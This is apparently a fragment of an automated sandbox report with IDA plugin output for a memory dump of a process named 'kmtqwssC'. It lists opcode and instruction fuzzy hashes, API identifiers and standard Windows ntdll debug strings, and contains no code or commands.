                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                  • Instruction ID: e39bd6c0fd22521d88068ab3fa24b67517168fbfe6b93ef5df39699cab098747
                                                                  • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                  • Instruction Fuzzy Hash: A72148B3B056C5AFD3028B29CC00B7577E8EF40798F1A01A8DE85876E3E364ED41C260
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9824499e850e3a8a6604eb670996c48d8c8a66e93e046fede85053af7448a291
                                                                  • Instruction ID: 174a1b40058410ed0b9509a2d8ba4103be6c66607a7af2d7b7a74bb7a29887f1
                                                                  • Opcode Fuzzy Hash: 9824499e850e3a8a6604eb670996c48d8c8a66e93e046fede85053af7448a291
                                                                  • Instruction Fuzzy Hash: B6218071A006299FCB11DF59C881ABEBBF8FF48744F510069F945B7250E778AE51CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                  • Instruction ID: da08faea8d911b7b33a181ccebd2eebd54725e3dcfecb200fe98c98b934623e6
                                                                  • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                  • Instruction Fuzzy Hash: 03318876A05641CFC710CF19C480B16BBE8FB88714F2188ADE94A8B762DB31E942CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bc9a83038eac1fa04ac4d6a8e5781267eb1f720f17c8ebae710eb1add31bd8b9
                                                                  • Instruction ID: 93f57491eb97e660f9b196da511579eaf93200c7355c8671b020416286b2d042
                                                                  • Opcode Fuzzy Hash: bc9a83038eac1fa04ac4d6a8e5781267eb1f720f17c8ebae710eb1add31bd8b9
                                                                  • Instruction Fuzzy Hash: 42212B3274A6899BE3134768CD04F6477D4BF41778F2603A8EA649B6F2DB6CD881C291
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7857c4ec6b8e68c379e417a8e1dfa06ef2886a360192c5684d64e802a6084f9f
                                                                  • Instruction ID: 8e13c35b32383a15899cb5b7117662a8ebcdfafaf21adf99d9fd1ef136dcf7c5
                                                                  • Opcode Fuzzy Hash: 7857c4ec6b8e68c379e417a8e1dfa06ef2886a360192c5684d64e802a6084f9f
                                                                  • Instruction Fuzzy Hash: 7A21FAB1E01258ABCB14CFAAD981AEEFBF8FF98710F10012FE415A7254D7749A45CB64
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 421ad513d4120bf4fd288a6a7c8683bfa104266f4f77e7597eae36f4da399d23
                                                                  • Instruction ID: 684bf26550c70ce069a6c7acd492b8235fbd5d9c11dea78830fed251f0ad98db
                                                                  • Opcode Fuzzy Hash: 421ad513d4120bf4fd288a6a7c8683bfa104266f4f77e7597eae36f4da399d23
                                                                  • Instruction Fuzzy Hash: 46219072601A04AFC715CF65C990F9BB7B9EF88780F10056DF60AD7660D635EA44CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                  • Instruction ID: 28143361fdc790b304f889c0a55815dc517bf412c6437dd184b65a91c848f54d
                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                  • Instruction Fuzzy Hash: BB218C72A4020AEFDB228F94CC40F9EBBB9EF98310F200859F964A7251D734DA508F50
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                  • Instruction ID: f5435dfda5d49aee0cc7df080cfcaf00dd17fc77941b7a28e244d30718df89f1
                                                                  • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                  • Instruction Fuzzy Hash: 71215E75E00219AFCB05CF99C881DAEBBB9EF58344B1141A9E805AB351DB319E45CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                  • Instruction ID: e6d61ca3ad2ac5525a2a569654c2b854d66b25c00c0508310434c57dd8cd1350
                                                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                  • Instruction Fuzzy Hash: 5021CD72684A49DFC721DF5AC540F66B7E6EB94B54F21827DE549A7620C730ED00CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 936660cc549cee179fa5f1c832234492a10605acd1a8b3200fa54758891ea229
                                                                  • Instruction ID: 9051c0f1366feb89637918d2c2ba24de755717aaa4f473f8923de701cde8a8a3
                                                                  • Opcode Fuzzy Hash: 936660cc549cee179fa5f1c832234492a10605acd1a8b3200fa54758891ea229
                                                                  • Instruction Fuzzy Hash: ED11C873B46711EBCB03CF89C9C0956B7E9AF46B10B26406DED089F214D672D901C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd3b72ce99ee739890d3d19aa283958457749c436e67a30a56af59bb1936c274
                                                                  • Instruction ID: 1493b3fccfb67cc1cf142730699b539272b00253c4d87875e113a7d5844a641d
                                                                  • Opcode Fuzzy Hash: dd3b72ce99ee739890d3d19aa283958457749c436e67a30a56af59bb1936c274
                                                                  • Instruction Fuzzy Hash: 2E216F76A44206DFCB05CF58C981AAEBBB9FF88714F21416ED504A7361D771AE0ACBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2796a10d7152d5a5a6e3b8682532fe5e1352ae86295ad3c11054da1a9013c5d8
                                                                  • Instruction ID: 4788e51eab1c5fd2e6bc757c13eaa42f7869d1c0f73d6d99207920a74e135c7d
                                                                  • Opcode Fuzzy Hash: 2796a10d7152d5a5a6e3b8682532fe5e1352ae86295ad3c11054da1a9013c5d8
                                                                  • Instruction Fuzzy Hash: 982190B1605B10EFC7218F68C881F66B3F8FF84750F14882DE99AD7250DA70E950CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b1e8278b7909c3fd156544c33ae06c7f517525c8b34fde37d7afebb811b5b6d3
                                                                  • Instruction ID: 1acc3be9aa1a0eb215de72b2fc88b7599b456caaf5dda58c423ee6b766719687
                                                                  • Opcode Fuzzy Hash: b1e8278b7909c3fd156544c33ae06c7f517525c8b34fde37d7afebb811b5b6d3
                                                                  • Instruction Fuzzy Hash: 3C116B773041509FCB09CB35CD81EAB725BEFD13B4B2A492CD526CB2A0DA31D912C3A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63a2d80d8ea72ac07d10381c8e411f163b9c715bcf29ea56b7126466245f05a6
                                                                  • Instruction ID: dc1a35ae94f027fb61deebdb97a8088fce1af7e4e69b0b0c2b224e60b78c6dc9
                                                                  • Opcode Fuzzy Hash: 63a2d80d8ea72ac07d10381c8e411f163b9c715bcf29ea56b7126466245f05a6
                                                                  • Instruction Fuzzy Hash: E71106722A0614EFC712CF69CD40F8A77ACEF96754F214028F616DB660DA74D945CBE0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bfda760c60659141eada89c6f584feed08786a9264a3909aff68c18059af880
                                                                  • Instruction ID: 3283cbec25c7522fb107d0039b110692f8513ca95a0e67afa839a0251c87a1a2
                                                                  • Opcode Fuzzy Hash: 9bfda760c60659141eada89c6f584feed08786a9264a3909aff68c18059af880
                                                                  • Instruction Fuzzy Hash: 921148B3B083109FD220573B8DC0F57B6ED9F60660F22082EF605E72B4D970DE5582A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction ID: 03d4b19b7278f01fc0f48ac8da0cecb136ae4eb42b8d0ccbd073221963ae77b3
                                                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction Fuzzy Hash: 09110132A00909AFCB19CB54C801F9EF7F6FF84210F058269EC59A7350E671BE45CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction ID: a817ee5e32d2d3efcd806456b65777681c4e97d93746b3402391be4dceac400f
                                                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction Fuzzy Hash: 632106B6A01B059FD3A0CF29C440B52BBF4FB48B10F50492EE98ACBB50E371E854CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29949a1643323c1665445cafeb9e31a459106dfd82d3f8332de68384f5322663
                                                                  • Instruction ID: 74439096505a596e5436d57b3eb009f2d31c78cb72e203b5fbcda990bd76379d
                                                                  • Opcode Fuzzy Hash: 29949a1643323c1665445cafeb9e31a459106dfd82d3f8332de68384f5322663
                                                                  • Instruction Fuzzy Hash: 3B119AB6A01325EBCB15CF99C580E4ABBF8AF94614B154079DD09AB320D674DE00CBE0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction ID: 77c29fa10dab82f9c10cd9b67d3731b9c5e8eb9dba08a717d1b28923b9a8d7e8
                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction Fuzzy Hash: 1F11C132605640EFD721AF44C880F5677E6EB51784F19842DE908AB160DB3DDC80C7A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2111d58f813f269bdf4d4049ea1f80381a25cb5a0b2ea8635cf1be248f4bb0b
                                                                  • Instruction ID: 4bfc33075c2b5f70a1b0772e15e970cee5ca270c7d819a2cc56865840c97a8ae
                                                                  • Opcode Fuzzy Hash: c2111d58f813f269bdf4d4049ea1f80381a25cb5a0b2ea8635cf1be248f4bb0b
                                                                  • Instruction Fuzzy Hash: 8F012B3174A5886FE31292A9D854F67B79CEF80394F0600A8F904971A0D614DC40C2B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 613a55592948477d98d572287b02054c2db672fe553138c02d5505fdaeb4c03a
                                                                  • Instruction ID: 1d46f189367ce59b5b372d39748386777fedb49600bc9dc26becef2cc869c3dc
                                                                  • Opcode Fuzzy Hash: 613a55592948477d98d572287b02054c2db672fe553138c02d5505fdaeb4c03a
                                                                  • Instruction Fuzzy Hash: 7801A2B2245700AFD3315F15D942F93BAB89F55B54F11042EB20A9F3A0D6B0D9A1CB58
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction ID: 757d496613000d098e90961152eb1c58531f4cb23690ea9120bf2764ae93b08b
                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction Fuzzy Hash: 54018B32209AC49FD3228729C948F6677ECEF55794F0904A9F908CBAA2D738DD40C662
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: df5417c50f7bc6673302f50653fde215013624a9cec7fe5bf07c9277ff0e35da
                                                                  • Instruction ID: c675976f8b21f1dc30da02b104686e83a58990240335d032b769f9a775737698
                                                                  • Opcode Fuzzy Hash: df5417c50f7bc6673302f50653fde215013624a9cec7fe5bf07c9277ff0e35da
                                                                  • Instruction Fuzzy Hash: BEE09273100A949BC311EB29CD01FDB77AAEF60360F014529B11A571A0CB34AD94C7A8
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 83484102ebeb0712b1c6d14b0acc8087187f7acc15ab1c1d11c81f21ca054d9f
                                                                  • Instruction ID: 0b6a9951e2b01c84b6d521ea74b9c1502a3d090f253746668807c566e54932ec
                                                                  • Opcode Fuzzy Hash: 83484102ebeb0712b1c6d14b0acc8087187f7acc15ab1c1d11c81f21ca054d9f
                                                                  • Instruction Fuzzy Hash: 785118B6E04156BFDB11DF9C8D80D7EFBB8BB09204B108269E468D7645D278DF648BE0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: d629c47ab4cd9c88f2f9a9e5fe14c09ab10bce28616770da947aed47e706729c
                                                                  • Instruction ID: c0418ec703d432ea13cd0c76a8501ccc2349fb952f0c03f4511e227d0e9f6436
                                                                  • Opcode Fuzzy Hash: d629c47ab4cd9c88f2f9a9e5fe14c09ab10bce28616770da947aed47e706729c
                                                                  • Instruction Fuzzy Hash: BC5136B5A44A86AFCB20CF9CC8809BFF7F9EF44204B008659E49DD3696E670DF448761
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 2CE44742
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 2CE44787
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 2CE446FC
                                                                  • ExecuteOptions, xrefs: 2CE446A0
                                                                  • Execute=1, xrefs: 2CE44713
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 2CE44655
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 2CE44725
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 2CE402E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 2CE402BD
                                                                  • RTL: Re-Waiting, xrefs: 2CE4031E
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 2CE47B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 2CE47B7F
                                                                  • RTL: Re-Waiting, xrefs: 2CE47BAC
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE4728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 2CE472A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 2CE47294
                                                                  • RTL: Re-Waiting, xrefs: 2CE472C1
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064